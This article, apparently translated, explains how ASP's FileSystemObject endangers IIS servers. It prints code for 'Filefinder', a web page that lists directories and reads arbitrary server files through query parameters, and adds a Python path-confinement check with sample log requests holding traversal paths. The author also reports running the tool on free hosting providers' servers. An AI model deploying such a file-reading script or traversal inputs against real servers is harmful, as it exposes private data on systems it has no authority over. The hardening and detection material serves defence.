The threat of the FSO object to IIS Web server data security in ASP, and its countermeasures (FSO special topic)

Source: Internet
Author: User
Tags: access database, file permissions
Scripting.FileSystemObject is one of the many COM objects that Scrrun.dll exposes to VBScript and JScript. It gives very convenient access to text files and directories, but for the same reason it poses a threat to the data security of an IIS Web server.

Filefinder's code is simple: three functions and about 30 lines of sequential code.

The most critical part is the FindFiles function, which walks the directory tree by calling itself recursively and searches for files with a specific file name extension.


Function FindFiles(strStartFolder, strExt)
    Dim n
    Dim oThisFolder
    Dim oFolders
    Dim oFiles
    Dim oFolder
    Dim oFile

    ' If the system administrator has set file system permissions carefully, the
    ' code below will raise errors, but some directories can still be listed, so
    ' the errors are simply ignored and the search continues.
    On Error Resume Next

    n = 0
    Response.Write "<b>searching " & strStartFolder & "</b><br>"

    ' g_fs is a page-level Scripting.FileSystemObject instance created elsewhere in ff.asp
    Set oThisFolder = g_fs.GetFolder(strStartFolder)
    Set oFiles = oThisFolder.Files
    For Each oFile In oFiles
        ' For a file with the requested extension, output a link back to this page
        ' with a different command: cmd=read reads the text file at the given physical path
        If IsSuffix(oFile.Path, strExt) Then
            Response.Write "<a target=_blank href='ff.asp?cmd=read&path=" & Server.HTMLEncode(oFile.Path) & "'>" & _
                           "<font color='DodgerBlue'>" & oFile.Path & "</font></a><br>"
            If Err = 0 Then
                n = n + 1
            End If
        End If
    Next

    ' Recurse into each subfolder and accumulate the count
    Set oFolders = oThisFolder.SubFolders
    For Each oFolder In oFolders
        n = n + FindFiles(oFolder.Path, strExt)
    Next

    FindFiles = n
End Function

The following code parses the parameters that follow the URL:


' Read the value of each parameter
strCmd = UCase(Request.QueryString("cmd"))
strPath = Request.QueryString("path")
strExt = Request.QueryString("ext")
bRawData = UCase(Request.QueryString("raw"))

' Default: search for .asp files starting from the current directory
If strPath = "" Then
    strPath = "."
End If
If strExt = "" Then
    strExt = ".asp"
End If

' Execute different code depending on the command cmd
' (strCmd was upper-cased above, so the Case labels must be upper case too)
Select Case strCmd
    Case "FIND"
        Response.Write FindFiles(strPath, strExt) & " file(s) found"
    Case "READ"
        If bRawData = "T" Then
            Response.Write ReadTextFile(strPath)
        Else
            Response.Write "<pre>" & Server.HTMLEncode(ReadTextFile(strPath)) & "</pre>"
        End If
    Case Else
        Response.Write ""   ' usage text truncated in the source
End Select

As the analysis above shows, given sufficient permissions Filefinder can locate any text file on the IIS Web server and display its contents with ease. For non-text files it can at least confirm that they exist and reveal their paths, which is sometimes extremely valuable to an experienced attacker.
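As an added example (not part of the original article or of Filefinder itself), the Python below shows the two defensive counterparts to the `cmd=read&path=` handler above: a confinement check that resolves a requested path against a web root using Windows path rules, and a detection pass over an IIS W3C extended log that flags read requests whose path leaves that root. The web root, the `/ff.asp` stem and the log lines are constructed assumptions.

```python
import ntpath
from urllib.parse import parse_qs

# Assumed web root for this example (not taken from the article).
WEB_ROOT = r"C:\Inetpub\wwwroot"

# Constructed IIS W3C extended log excerpt; the queries mirror ff.asp's cmd/path parameters.
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-01 10:00:01 10.0.0.5 GET /ff.asp cmd=find&ext=.asp 200
2001-05-01 10:00:07 10.0.0.5 GET /ff.asp cmd=read&path=C:\Inetpub\wwwroot\default.asp 200
2001-05-01 10:00:09 10.0.0.5 GET /ff.asp cmd=read&path=D:\Accounts\customers.mdb 200
2001-05-01 10:00:12 10.0.0.5 GET /ff.asp cmd=read&path=..\..\WINNT\win.ini 200
2001-05-01 10:01:00 10.0.0.9 GET /index.html - 200
"""

def resolve_within_root(root, requested):
    """Return the canonical path if `requested` stays under `root`, else None.
    ntpath is used explicitly so Windows rules (case-insensitive names, drive letters,
    backslashes, '..' collapsing) apply no matter which host runs this check."""
    root_norm = ntpath.normcase(ntpath.normpath(root))
    # Relative input is resolved against the root; an absolute path, a drive switch or a
    # root-relative path (\WINNT\...) replaces the root and therefore fails the prefix test.
    candidate = ntpath.normpath(ntpath.join(root, requested))
    cand_norm = ntpath.normcase(candidate)
    if cand_norm == root_norm or cand_norm.startswith(root_norm + "\\"):
        return candidate
    return None

def parse_w3c(log_text):
    """Yield one dict per entry, keyed by the names given in the #Fields: directive."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def flag_escaping_reads(log_text, root=WEB_ROOT):
    """List (client ip, requested path) for cmd=read requests that leave the web root."""
    hits = []
    for rec in parse_w3c(log_text):
        if rec["cs-uri-stem"].lower() != "/ff.asp":
            continue
        query = parse_qs(rec["cs-uri-query"], keep_blank_values=True)
        if query.get("cmd", [""])[0].lower() != "read":   # ff.asp compares cmd case-insensitively
            continue
        requested = query.get("path", [""])[0]
        if resolve_within_root(root, requested) is None:
            hits.append((rec["c-ip"], requested))
    return hits
```

The same `resolve_within_root` logic, applied inside the page before the `ReadTextFile` call, is what turns an unrestricted file reader into one confined to the web root; the log pass finds past requests that would have failed that check.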

These threats to data security, however, assume that the user running ff.asp has at least read permission on the directories and files. Because the default security setting of Windows NT Server after installation gives all users "Read" access to directories and files, directory and file information can be read one level after another by the IIS default account IUSR_servername or by any other user. Most Windows NT Server administrators are primarily concerned with keeping the system running and are generally reluctant to change the default directory and file permissions; after all, doing so carries considerable risk and requires a lot of experience. Filefinder can therefore be used to check whether the file system security settings of an NT Server acting as a Web server are actually secure.

The author specifically set the permissions on the file system of an IIS Web server but, limited by inexperience, caused many strange errors; for example, the experimental NT Server 4.0 could no longer connect to an Access database. These functions had been normal until the file system permission changes were made.

For purely research purposes, the author also experimented on the free ASP space I had applied for (including my personal homepage provided by CSDN), and the result was that Filefinder ran smoothly. On the personal home page I applied for at http://www2.domaindlx.com/index.html this problem did not exist, so it can be seen that this free ASP home page provider takes the matter more seriously. Although the DOMAINDLX Web servers run on Windows Server, their default file system security permissions are not significantly different from those of NT 4.0.

Because of the author's limited ability, the discussion of this problem ends here. This article is only meant as a reference for domestic ASP home page providers, and I hope it can be helpful to the data security of both providers and their customers.

Appendix: Web services built on other, similar server-side scripting technologies that also provide functionality like Scripting.FileSystemObject for file system operations should have the same problem, regardless of platform.
